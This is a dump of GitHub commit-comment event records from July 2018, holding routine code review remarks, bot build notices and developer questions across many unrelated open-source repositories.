{"id":"7921360075","type":"CommitCommentEvent","actor":{"login":"khizerhs"},"repo":{"name":"azhartalha/Movie-Mania"},"payload":{"comment":{"id":29602154,"position":19,"line":19,"path":"frontend/src/signup/index.js","commit_id":"41e149e1d182ad79023f4213b0e2708b0e2936fc","created_at":"2018-07-05T07:12:19Z","updated_at":"2018-07-05T07:12:19Z","author_association":"NONE","body":"Please use a meaningful name for `ca`"}},"created_at":"2018-07-05T07:12:19Z"}
{"id":"7921361461","type":"CommitCommentEvent","actor":{"login":"BJostmeyer"},"repo":{"name":"IBM/IBM-runbook-automation-collaboration"},"payload":{"comment":{"id":29602162,"position":null,"line":null,"path":null,"commit_id":"b30c568a7f4d55e524ab9d24d89f7daa0eec7208","created_at":"2018-07-05T07:12:41Z","updated_at":"2018-07-05T07:12:41Z","author_association":"CONTRIBUTOR","body":" Initial version of a CONCEPT runbook including \"Success\"Gateway Automation\"\r\n\r\nThe purpose of this runbook is to deliver an example how to implement a conditional workflow for automation in a runbook with help of the features \"Gateway (GW) Auromation\" and \"Multi-Target SCRIPT Automation\" (MTA). The Success GW can parse the output of another MTA automation and create another target list for those systems on which previous automation ended with state FAILED | SUCCESS | UNSUCCESSFULL."}},"created_at":"2018-07-05T07:12:41Z"}
{"id":"7921363134","type":"CommitCommentEvent","actor":{"login":"chinatreeqy"},"repo":{"name":"chinatreeqy/hello-world"},"payload":{"comment":{"id":29602166,"position":null,"line":null,"path":null,"commit_id":"1b7c2dac766c6c9352a29a986be6cd22d4b857b3","created_at":"2018-07-05T07:13:07Z","updated_at":"2018-07-05T07:13:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-05T07:13:07Z"}
{"id":"7921364025","type":"CommitCommentEvent","actor":{"login":"waterwater98"},"repo":{"name":"Jack-Cherish/python-spider"},"payload":{"comment":{"id":29602169,"position":null,"line":null,"path":null,"commit_id":"54c9d32c88f065bb26edc5b10ef3baa3a1694303","created_at":"2018-07-05T07:13:20Z","updated_at":"2018-07-05T07:13:20Z","author_association":"NONE","body":"哦，好的。谢谢回复哈。"}},"created_at":"2018-07-05T07:13:20Z"}
{"id":"7921365069","type":"CommitCommentEvent","actor":{"login":"BrainSlayer"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29602170,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-05T07:13:36Z","updated_at":"2018-07-05T07:13:36Z","author_association":"NONE","body":"i checked it in dd-wrt. compiles well without issues"}},"created_at":"2018-07-05T07:13:36Z"}
{"id":"7921366807","type":"CommitCommentEvent","actor":{"login":"webner"},"repo":{"name":"Neilpang/acme.sh"},"payload":{"comment":{"id":29602175,"position":18,"line":852,"path":"dnsapi/README.md","commit_id":"dd72f7638d69c48948056778c7526257c60a0400","created_at":"2018-07-05T07:14:01Z","updated_at":"2018-07-05T07:14:01Z","author_association":"CONTRIBUTOR","body":"no it doesn't ;)\r\nthere is already a PR to fix that from dampfklon https://github.com/Neilpang/acme.sh/pull/1690"}},"created_at":"2018-07-05T07:14:01Z"}
{"id":"7921370879","type":"CommitCommentEvent","actor":{"login":"khizerhs"},"repo":{"name":"azhartalha/Movie-Mania"},"payload":{"comment":{"id":29602184,"position":73,"line":73,"path":"frontend/src/signup/index.js","commit_id":"41e149e1d182ad79023f4213b0e2708b0e2936fc","created_at":"2018-07-05T07:15:02Z","updated_at":"2018-07-05T07:15:02Z","author_association":"NONE","body":"method names always start with a lowercase. use camel case. change to `signUp()`"}},"created_at":"2018-07-05T07:15:02Z"}
{"id":"7921376343","type":"CommitCommentEvent","actor":{"login":"15195922818"},"repo":{"name":"15195922818/cea"},"payload":{"comment":{"id":29602200,"position":null,"line":null,"path":null,"commit_id":"a1e453ab7af54d5fa787d0d7f722f40c60de1f3c","created_at":"2018-07-05T07:16:20Z","updated_at":"2018-07-05T07:16:20Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-05T07:16:20Z"}
{"id":"7921377096","type":"CommitCommentEvent","actor":{"login":"khizerhs"},"repo":{"name":"azhartalha/Movie-Mania"},"payload":{"comment":{"id":29602202,"position":45,"line":39,"path":"frontend/src/App.css","commit_id":"ca6f694fc6b77c263e24ff6fde770ca39344d473","created_at":"2018-07-05T07:16:32Z","updated_at":"2018-07-05T07:16:32Z","author_association":"NONE","body":"break line after every `;`\r\n"}},"created_at":"2018-07-05T07:16:32Z"}
{"id":"7921377775","type":"CommitCommentEvent","actor":{"login":"xdr940"},"repo":{"name":"xdr940/faces_detected"},"payload":{"comment":{"id":29602204,"position":68,"line":68,"path":"demo4.py","commit_id":"c56c0fd97f3ce12bdcdee139d020958100d5d173","created_at":"2018-07-05T07:16:43Z","updated_at":"2018-07-05T07:16:43Z","author_association":"OWNER","body":"control the hoder"}},"created_at":"2018-07-05T07:16:43Z"}
{"id":"7921380228","type":"CommitCommentEvent","actor":{"login":"pellmann"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602207,"position":53,"line":80,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T07:17:20Z","updated_at":"2018-07-05T07:17:20Z","author_association":"CONTRIBUTOR","body":"I don't think we need the same code as the linked senders in the TODO, because it is scoped to a device. But it is more necessary than now, therefore the TODO.. I wanted to think about this in the next step."}},"created_at":"2018-07-05T07:17:20Z"}
{"id":"7921380440","type":"CommitCommentEvent","actor":{"login":"zsrkmyn"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29602208,"position":null,"line":null,"path":null,"commit_id":"ffa25e682ae789f7c3048a45c871db00d6f32eb3","created_at":"2018-07-05T07:17:22Z","updated_at":"2018-07-05T07:17:22Z","author_association":"MEMBER","body":"A suggestion: specify the affected packages' names in commit messages."}},"created_at":"2018-07-05T07:17:22Z"}
{"id":"7921381597","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602211,"position":29,"line":660,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:17:39Z","updated_at":"2018-07-05T07:17:39Z","author_association":"COLLABORATOR","body":"`\"` не нужны вообще."}},"created_at":"2018-07-05T07:17:39Z"}
{"id":"7921382041","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602213,"position":30,"line":661,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:17:45Z","updated_at":"2018-07-05T07:17:45Z","author_association":"COLLABORATOR","body":"`\"` не нужны вообще."}},"created_at":"2018-07-05T07:17:45Z"}
{"id":"7921382426","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602215,"position":35,"line":664,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:17:51Z","updated_at":"2018-07-05T07:17:51Z","author_association":"COLLABORATOR","body":"`\"` не нужны вообще."}},"created_at":"2018-07-05T07:17:51Z"}
{"id":"7921382736","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602216,"position":36,"line":665,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:17:55Z","updated_at":"2018-07-05T07:17:55Z","author_association":"COLLABORATOR","body":"`\"` не нужны вообще."}},"created_at":"2018-07-05T07:17:55Z"}
{"id":"7921385347","type":"CommitCommentEvent","actor":{"login":"yuhhaurlin"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29602221,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-05T07:18:34Z","updated_at":"2018-07-05T07:18:34Z","author_association":"COLLABORATOR","body":"Could be all version of kernel API without the latest parameter. Thanks for your information."}},"created_at":"2018-07-05T07:18:34Z"}
{"id":"7921396207","type":"CommitCommentEvent","actor":{"login":"BrainSlayer"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29602246,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-05T07:21:12Z","updated_at":"2018-07-05T07:21:12Z","author_association":"NONE","body":"but api for nla_parse has been changed in 4.14. so the last argument is only valid for 4.14.  so it may fail to compile with older openwrt versions which are using a older compat wireless tree which doesnt handle that api change. as a workaround you may just remove the last argument"}},"created_at":"2018-07-05T07:21:12Z"}
{"id":"7921396317","type":"CommitCommentEvent","actor":{"login":"sssunnn1"},"repo":{"name":"aiace9/NMQM"},"payload":{"comment":{"id":29602247,"position":null,"line":null,"path":null,"commit_id":"47caf31a6a2fc2d32c29eaceadbca880d8708bb6","created_at":"2018-07-05T07:21:14Z","updated_at":"2018-07-05T07:21:14Z","author_association":"NONE","body":"Hi Thank you for sharing all this, \r\nin the hydrogen_radial, i'm trying to understand the line below \r\nycusp = (y(i-1)*f(i-1)+f(i+1)y(i+1)+10.0_dpf(i)*y(i)) / 12.0_dp \r\n\r\nWhat is exacly the ycusp?\r\n\r\nI understand that the equation below can be reorganized to give the equation above.\r\nyn+1 =( (12-10fn)yn - f(n-1)y(n-1) ) / f(n+1)\r\n\r\nBut how can i use the same yn once as ycusp, and another time as yn (which is y(i) in the code), and what is exactly the physical meaning of ycusp.\r\n\r\nThank you for your help."}},"created_at":"2018-07-05T07:21:14Z"}
{"id":"7921397783","type":"CommitCommentEvent","actor":{"login":"0x04"},"repo":{"name":"bullgit/WAT"},"payload":{"comment":{"id":29602251,"position":null,"line":null,"path":null,"commit_id":"532dd54b49ea93d2559f5f6a413b18e830c0362e","created_at":"2018-07-05T07:21:35Z","updated_at":"2018-07-05T07:21:35Z","author_association":"MEMBER","body":"Well, thank you for take the time for some blaming. As you can see I referenced a link where these samples come from. I know about floating point math, but for all that doesn't this result is possible irritating."}},"created_at":"2018-07-05T07:21:35Z"}
{"id":"7921398223","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602253,"position":34,"line":665,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:21:42Z","updated_at":"2018-07-05T07:21:42Z","author_association":"COLLABORATOR","body":"`. ' WHERE `products`.`status` = ?s'`"}},"created_at":"2018-07-05T07:21:42Z"}
{"id":"7921400569","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602258,"position":28,"line":46,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T07:22:18Z","updated_at":"2018-07-05T07:22:18Z","author_association":"CONTRIBUTOR","body":"is it actually necessary to have protected visibility?"}},"created_at":"2018-07-05T07:22:18Z"}
{"id":"7921401333","type":"CommitCommentEvent","actor":{"login":"strogonoff"},"repo":{"name":"riboseinc/open.ribose.com"},"payload":{"comment":{"id":29602262,"position":null,"line":null,"path":null,"commit_id":"1f422ad1f14bfadacc63cee4aa600a89345804f1","created_at":"2018-07-05T07:22:28Z","updated_at":"2018-07-05T07:22:28Z","author_association":"CONTRIBUTOR","body":"Awesome, I was under wrong impression that GitHub would always ask over HTTP(S).\n\n> On Jul 5, 2018, at 1:44 PM, Ronald Tse <notifications@github.com> wrote:\n> \n> @strogonoff <https://github.com/strogonoff> as these repos are public, anyone can clone them, so there's no username/password issue.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/riboseinc/open.ribose.com/commit/1f422ad1f14bfadacc63cee4aa600a89345804f1#commitcomment-29601975>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAR4X8VU--miIh0t5-EcYx8g_ZuZCDc6ks5uDbXJgaJpZM4VDU8e>.\n> \n\n"}},"created_at":"2018-07-05T07:22:28Z"}
{"id":"7921402267","type":"CommitCommentEvent","actor":{"login":"Rola1993"},"repo":{"name":"Rola1993/mysite_django"},"payload":{"comment":{"id":29602265,"position":null,"line":null,"path":null,"commit_id":"43991a81817de9252042f7f3b44d9e2d2b522694","created_at":"2018-07-05T07:22:42Z","updated_at":"2018-07-05T07:22:42Z","author_association":"OWNER","body":"@cooncesean Hi Sean, thank you for your advice. I am sorry I just find this comment. I will do it right now.\r\nOne thing I want to mention is that I just find that the project profile mistakenly shows another contributor.\r\nIt was because of a user setting problem on digitalOcean. But all of the code is produced by me. Just want to clarify it to eliminate any potential misunderstanding.\r\nThank you for taking a look at it and giving me this suggestion again!"}},"created_at":"2018-07-05T07:22:42Z"}
{"id":"7921402503","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602268,"position":38,"line":667,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:22:45Z","updated_at":"2018-07-05T07:22:45Z","author_association":"COLLABORATOR","body":"`'A', implode(' ', $joins)`"}},"created_at":"2018-07-05T07:22:45Z"}
{"id":"7921402699","type":"CommitCommentEvent","actor":{"login":"ijuma"},"repo":{"name":"easymock/easymock"},"payload":{"comment":{"id":29602269,"position":null,"line":null,"path":null,"commit_id":"0239816375a9b75e9b4c98978740315b5bc6dffa","created_at":"2018-07-05T07:22:49Z","updated_at":"2018-07-05T07:22:49Z","author_association":"CONTRIBUTOR","body":"@henri-tremblay The asm upgrade unlocks Java 11 support. Java 11 has entered ramp-down mode, so it would be great to have an EasyMock release that supports it."}},"created_at":"2018-07-05T07:22:49Z"}
{"id":"7921403913","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29602272,"position":null,"line":null,"path":null,"commit_id":"2c733ddf0e5c4c0afa643875968583d08cadc2d5","created_at":"2018-07-05T07:23:08Z","updated_at":"2018-07-05T07:23:08Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/1dd0c7e8-1106-4663-8230-f025fd72564e?project=153942441948"}},"created_at":"2018-07-05T07:23:08Z"}
{"id":"7921404778","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602275,"position":22,"line":270,"path":"en/developer_guide/core/db/placeholders.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:23:19Z","updated_at":"2018-07-05T07:23:19Z","author_association":"COLLABORATOR","body":"Тут и ниже `\"` не нужны."}},"created_at":"2018-07-05T07:23:19Z"}
{"id":"7921427598","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29602313,"position":null,"line":null,"path":null,"commit_id":"46533f7f5f0747128317c87efa3f6ddf03cc5b96","created_at":"2018-07-05T07:28:33Z","updated_at":"2018-07-05T07:28:33Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 681](https://travis-ci.org/per1234/arduino-ci-script/builds/400281194) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00681-001-tsv"}},"created_at":"2018-07-05T07:28:33Z"}
{"id":"7921427950","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29602314,"position":null,"line":null,"path":null,"commit_id":"46533f7f5f0747128317c87efa3f6ddf03cc5b96","created_at":"2018-07-05T07:28:38Z","updated_at":"2018-07-05T07:28:38Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 681](https://travis-ci.org/per1234/arduino-ci-script/builds/400281194) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00681"}},"created_at":"2018-07-05T07:28:38Z"}
{"id":"7921429240","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29602318,"position":8,"line":8,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T07:28:55Z","updated_at":"2018-07-05T07:28:55Z","author_association":"OWNER","body":"+#Может возвращать список поездов на станции по типу (см. ниже): кол-во грузовых, пассажирских\r\nya podumal esli na stancy budet poezda bylo by logicne podelit i po tipu....dlya etogo sozdal :TYPE"}},"created_at":"2018-07-05T07:28:55Z"}
{"id":"7921430973","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29602321,"position":null,"line":null,"path":null,"commit_id":"e60f89059bb9645f3528e3c4d694937843486c3a","created_at":"2018-07-05T07:29:18Z","updated_at":"2018-07-05T07:29:18Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/427ab9f0-9bfb-4da4-a955-ba9b30eb67e3?project=153942441948"}},"created_at":"2018-07-05T07:29:18Z"}
{"id":"7921431906","type":"CommitCommentEvent","actor":{"login":"Indexyz"},"repo":{"name":"Indexyz/coolq-minecraft"},"payload":{"comment":{"id":29602323,"position":5,"line":3,"path":".gitignore","commit_id":"afe71cfb322d18225e20c88539faa2c2c559dbaf","created_at":"2018-07-05T07:29:30Z","updated_at":"2018-07-05T07:29:30Z","author_association":"OWNER","body":"写 mod 啊（跑\r\n就是 Minecraft 和 QQ 群聊天同步啊"}},"created_at":"2018-07-05T07:29:30Z"}
{"id":"7921436776","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602338,"position":25,"line":624,"path":"ru/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:30:30Z","updated_at":"2018-07-05T07:30:30Z","author_association":"COLLABORATOR","body":"Тут и ниже `\"` не нужны."}},"created_at":"2018-07-05T07:30:30Z"}
{"id":"7921437084","type":"CommitCommentEvent","actor":{"login":"pmackinlay"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29602340,"position":32,"line":2669,"path":"src/devices/machine/z80scc.cpp","commit_id":"44bc4d6bc32cffe6c4bea8b5f148b7663b62c781","created_at":"2018-07-05T07:30:34Z","updated_at":"2018-07-05T07:30:34Z","author_association":"CONTRIBUTOR","body":"This change breaks the keyboard (maybe generally serial) on InterPro. I am busy organising a lot of changes to that driver, and will look into this in more detail when I have pushed my current code."}},"created_at":"2018-07-05T07:30:34Z"}
{"id":"7921438926","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602342,"position":34,"line":629,"path":"ru/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:31:00Z","updated_at":"2018-07-05T07:31:00Z","author_association":"COLLABORATOR","body":"`. ' WHERE products.status = ?s'`"}},"created_at":"2018-07-05T07:31:00Z"}
{"id":"7921440302","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29602347,"position":42,"line":42,"path":"mysql-test/suite/innodb/t/virtual_purge.test","commit_id":"ae730dcd6cb73c1630a773ae2cd921978dc72d90","created_at":"2018-07-05T07:31:19Z","updated_at":"2018-07-05T07:31:19Z","author_association":"CONTRIBUTOR","body":"Based on the output, this `wait_all_purged.inc` will time out in about 30 seconds (it reports the history list length as 1, not 0). I think that we need to implement a parameter for passing the expected value."}},"created_at":"2018-07-05T07:31:19Z"}
{"id":"7921442658","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602351,"position":36,"line":631,"path":"ru/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:31:51Z","updated_at":"2018-07-05T07:31:51Z","author_association":"COLLABORATOR","body":"`'A', implode(' ', $joins)` — подстановка 'A' вместо плейсхолдера."}},"created_at":"2018-07-05T07:31:51Z"}
{"id":"7921445234","type":"CommitCommentEvent","actor":{"login":"AmedeeBulle"},"repo":{"name":"PaulNeumann/vagrant-boxes"},"payload":{"comment":{"id":29602361,"position":6,"line":24,"path":"OracleDatabase/12.2.0.1/Vagrantfile","commit_id":"b86d0d2e1083a4a896935c1a7f83af9e3be3b105","created_at":"2018-07-05T07:32:27Z","updated_at":"2018-07-05T07:32:27Z","author_association":"NONE","body":"FWIW [vagrant-timezone](https://github.com/tmatilai/vagrant-timezone) plugin has the same issue...\r\n\r\nI am happy with any workaround, but I want to avoid we set a wrong time zone.  \r\nEventually people who care about timezone will probably use the zone name (e.g. \"America/Los_Angeles\") as it is the only one which is not ambiguous and will continue to be correct across daylight saving time..."}},"created_at":"2018-07-05T07:32:27Z"}
{"id":"7921446770","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602362,"position":68,"line":349,"path":"ru/developer_guide/core/db/placeholders.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:32:50Z","updated_at":"2018-07-05T07:32:50Z","author_association":"COLLABORATOR","body":"Тут и ниже вместо `\"` нужно `'`, т.к. обычные строки."}},"created_at":"2018-07-05T07:32:50Z"}
{"id":"7921448737","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602365,"position":86,"line":361,"path":"ru/developer_guide/core/db/placeholders.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:33:18Z","updated_at":"2018-07-05T07:33:18Z","author_association":"COLLABORATOR","body":"Тут и ниже `\"` не нужны."}},"created_at":"2018-07-05T07:33:18Z"}
{"id":"7921449339","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602368,"position":4,"line":75,"path":"ru/developer_guide/core/db/structure_and_naming.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:33:26Z","updated_at":"2018-07-05T07:33:26Z","author_association":"COLLABORATOR","body":"Тут и ниже `\"` не нужны."}},"created_at":"2018-07-05T07:33:26Z"}
{"id":"7921456821","type":"CommitCommentEvent","actor":{"login":"sevu"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29602379,"position":null,"line":null,"path":null,"commit_id":"c7cda91250fac85ab371ec9ed3593e6c11381deb","created_at":"2018-07-05T07:35:10Z","updated_at":"2018-07-05T07:35:10Z","author_association":"MEMBER","body":"It looks like the Thief can never be recruited as he is not in the instructions.\r\nThough maybe the thief isn't that useful, he's more a special unit. maybe in the next scenario"}},"created_at":"2018-07-05T07:35:10Z"}
{"id":"7921465029","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"davidtrpcevski/android_frameworks_base"},"payload":{"comment":{"id":29602386,"position":null,"line":null,"path":null,"commit_id":"4fcf26644f39db176440880ceafb41e56441d668","created_at":"2018-07-05T07:36:50Z","updated_at":"2018-07-05T07:36:50Z","author_association":"NONE","body":"Going to test it "}},"created_at":"2018-07-05T07:36:50Z"}
{"id":"7921467647","type":"CommitCommentEvent","actor":{"login":"Camille92"},"repo":{"name":"ctubio/Krypto-trading-bot"},"payload":{"comment":{"id":29602395,"position":null,"line":null,"path":null,"commit_id":"da0d92c2304d44ac289f46bda2175b2b422515fe","created_at":"2018-07-05T07:37:28Z","updated_at":"2018-07-05T07:37:28Z","author_association":"CONTRIBUTOR","body":"Hi Carles, can you explain to me what is all that doing? :)\r\n"}},"created_at":"2018-07-05T07:37:28Z"}
{"id":"7921471548","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602403,"position":null,"line":null,"path":null,"commit_id":"7a02ef3974366d49c0a004a678a980312676cb0f","created_at":"2018-07-05T07:38:24Z","updated_at":"2018-07-05T07:38:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adding Readme.md in english on Github](https://trello.com/c/Io6RSo8S/6-adding-readmemd-in-english-on-github)"}},"created_at":"2018-07-05T07:38:24Z"}
{"id":"7921473847","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602407,"position":null,"line":null,"path":null,"commit_id":"623beb24b952e201dfdf1f6272efa7485ba7ce1f","created_at":"2018-07-05T07:38:57Z","updated_at":"2018-07-05T07:38:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update README, bug fix to checkbox](https://trello.com/c/gn7Ur7oo/19-update-readme-bug-fix-to-checkbox)"}},"created_at":"2018-07-05T07:38:57Z"}
{"id":"7921474083","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/application-licensing"},"payload":{"comment":{"id":29602409,"position":5,"line":115,"path":"application-licensing-licensor/application-licensing-licensor-api/src/main/java/com/xwiki/licensing/internal/UserCounter.java","commit_id":"867824198abe52426c18e61db5effafa36195549","created_at":"2018-07-05T07:39:00Z","updated_at":"2018-07-05T07:39:00Z","author_association":"COLLABORATOR","body":"I would have used ``newDocumentIsUser`` here instead of ``newObject != null``."}},"created_at":"2018-07-05T07:39:00Z"}
{"id":"7921474263","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602410,"position":null,"line":null,"path":null,"commit_id":"f2d590fed7255cdf5d577beaaf058cc936582a2b","created_at":"2018-07-05T07:39:02Z","updated_at":"2018-07-05T07:39:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update README, bug fix to checkbox](https://trello.com/c/gn7Ur7oo/19-update-readme-bug-fix-to-checkbox)"}},"created_at":"2018-07-05T07:39:02Z"}
{"id":"7921474587","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602411,"position":null,"line":null,"path":null,"commit_id":"5003bc5434d603c795f9401358307134eb1decc2","created_at":"2018-07-05T07:39:08Z","updated_at":"2018-07-05T07:39:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update README, bug fix to checkbox](https://trello.com/c/gn7Ur7oo/19-update-readme-bug-fix-to-checkbox)"}},"created_at":"2018-07-05T07:39:08Z"}
{"id":"7921476153","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29602416,"position":null,"line":null,"path":null,"commit_id":"5685c62f0649d05631b5314af03aa992a285e5d2","created_at":"2018-07-05T07:39:29Z","updated_at":"2018-07-05T07:39:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initiate repository Github](https://trello.com/c/ISbd374S/11-initiate-repository-github)"}},"created_at":"2018-07-05T07:39:29Z"}
{"id":"7921476321","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/application-licensing"},"payload":{"comment":{"id":29602418,"position":6,"line":116,"path":"application-licensing-licensor/application-licensing-licensor-api/src/main/java/com/xwiki/licensing/internal/UserCounter.java","commit_id":"867824198abe52426c18e61db5effafa36195549","created_at":"2018-07-05T07:39:32Z","updated_at":"2018-07-05T07:39:32Z","author_association":"COLLABORATOR","body":"Same as above, with ``oldDocumentIsUser``."}},"created_at":"2018-07-05T07:39:32Z"}
{"id":"7921480657","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwikisas/application-licensing"},"payload":{"comment":{"id":29602429,"position":6,"line":116,"path":"application-licensing-licensor/application-licensing-licensor-api/src/main/java/com/xwiki/licensing/internal/UserCounter.java","commit_id":"867824198abe52426c18e61db5effafa36195549","created_at":"2018-07-05T07:40:31Z","updated_at":"2018-07-05T07:40:31Z","author_association":"CONTRIBUTOR","body":"I'll improve it, thanks! "}},"created_at":"2018-07-05T07:40:31Z"}
{"id":"7921481710","type":"CommitCommentEvent","actor":{"login":"xvik"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29602431,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T07:40:45Z","updated_at":"2018-07-05T07:40:45Z","author_association":"OWNER","body":"The property can't be removed as it's a task configuration (files to build signature from). A user, of course, can modify it (even override). There is also configuration method below (line 181) which use Project.files().\r\nProperty initialized with empty collection simply to avoid null checks in all places"}},"created_at":"2018-07-05T07:40:45Z"}
